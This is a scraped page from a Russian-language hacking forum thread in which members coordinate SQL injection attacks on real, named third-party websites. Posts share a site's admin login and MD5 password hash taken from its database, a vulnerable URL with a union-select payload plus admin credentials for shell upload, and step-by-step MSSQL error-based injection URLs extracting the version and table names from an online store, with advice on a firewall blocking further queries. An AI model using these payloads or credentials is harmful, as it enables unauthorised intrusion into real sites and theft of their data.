HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5591  
Старый 21.02.2009, 00:14
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
С нами: 9133681

Репутация: 90
По умолчанию

pingvit там есть таблица pmr_admins , скорее всего там как раз и хряняться логин с пассом админки, вот логин: admin, вот md5 хэш пароля: 08913870713a4b932d796e47ccaebe8c
P.S. там ещё есть таблицы jos_users, phpbb_users, pmr_users но это все не то...

Последний раз редактировалось pinky07; 21.02.2009 в 00:22..
 
Ответить с цитированием

  #5592  
Старый 21.02.2009, 02:40
joomler
Новичок
Регистрация: 19.02.2009
Сообщений: 25
С нами: 9064855

Репутация: 10
По умолчанию

Привет всем)
у меня проблемка. Есть доступ в админку на сайте, я хотел было залить шелл туда но там нет таких полей(ни чего туда не загрузить кроме текста копи-паст, который отправляется в базу)
Мне бы хотелось рипнуть сайт, но как туда залить шелл? или может еще как то можно?
пробовал скуль иньект выдает это: Table 'kalinov_refer.passwords' doesn't exist
может как то скуль надо раскрутить?
 
Ответить с цитированием

  #5593  
Старый 21.02.2009, 03:05
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

joomler отвлекись ненадолго от компа, и подумай какого ответа ты сдесь ждёшь?

Вот просто , как , по твоему, на твой вопрос можно ответить? Ни сайта, ни даже названия движка ты не привёл, что там в твоей админке никто не знает, скуль? ну разумеется через скуль можно залиться, при соблюдении определённых условий, которые кстати перечислены в обзоре, линк на который ,в свою очередь, тебе давали выше.

Подвязывай заниматься ерундой, и почитай статьи на форуме. И многое станет ясно, а такими вопросами ты себе знаний не добавишь
 
Ответить с цитированием

  #5594  
Старый 21.02.2009, 03:35
joomler
Новичок
Регистрация: 19.02.2009
Сообщений: 25
С нами: 9064855

Репутация: 10
По умолчанию

jokester да наверное поторопился, надо почитать сначало на форуме согласен, но хочется то все и сразу)))))
Исправляю ошибки: 1) Что за движек я так и не понял , возможно он самописный
2) Вот сайт и уязвимый скрипт:
http://referats-online.ru/catalog_44.html?pid=44+union+select+1+from+user 3) В админке кроме редактирования статей и новостей больше ни чего нет. http://referats-online.ru/admin
Логин: 1
Пароль: 1

Ну теперь пойду почитаю топики)))
 
Ответить с цитированием

  #5595  
Старый 21.02.2009, 03:49
_Zeus_
Новичок
Регистрация: 18.02.2009
Сообщений: 6
С нами: 9066019

Репутация: 0
По умолчанию

Я вот нашел такое:
http://devicebondage.stockroom.com/category.aspx?category_id=196'
а что с ним делать?
 
Ответить с цитированием

  #5596  
Старый 21.02.2009, 08:57
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

_Zeus_, это mssql-inj. почитай статьи, и попробуй докрутить.
кстати, очень удобная скуля для новичка, я в свое время на такой же тренировался.

Последний раз редактировалось faza02; 21.02.2009 в 09:09..
 
Ответить с цитированием

  #5597  
Старый 21.02.2009, 09:03
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами: 9288132

Репутация: 571
По умолчанию

Никакая это не mysql.

Это MSSQL.

Код:
http://devicebondage.stockroom.com/category.aspx?category_id=196%20or%201=@@version
Читаем это:

http://forum.antichat.ru/thread30501.html

Последний раз редактировалось R1dex; 21.02.2009 в 09:06..
 
Ответить с цитированием

  #5598  
Старый 21.02.2009, 10:57
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами: 9838057

Репутация: 302
По умолчанию

Решил попробовать =) MSSQL
http://devicebondage.stockroom.com/category.aspx?category_id=196%20or%201=(SELECT+TOP +1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)
Выдает STORE_USER_ASSN
Дальше через Not in но чета не получается, в чем ошибка?
category_id=196 or 1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' STORE_USER_ASSN'))--
 
Ответить с цитированием

  #5599  
Старый 21.02.2009, 11:16
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

WebKnight Application Firewall Alert



AQTRONIX WebKnight is an application firewall for web servers and is released under the GNU General Public License. It is an ISAPI filter for securing web servers by blocking certain requests. If an alert is triggered WebKnight will take over and protect the web server.

возможно фаер блокирует остальные запросы
 
Ответить с цитированием

  #5600  
Старый 21.02.2009, 14:59
_Zeus_
Новичок
Регистрация: 18.02.2009
Сообщений: 6
С нами: 9066019

Репутация: 0
По умолчанию

Да ну, я не верю, что здесь ничего нельзя сделать.
Невозможного не бывает. Жаль, что я в этом нечего почти не понимаю.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.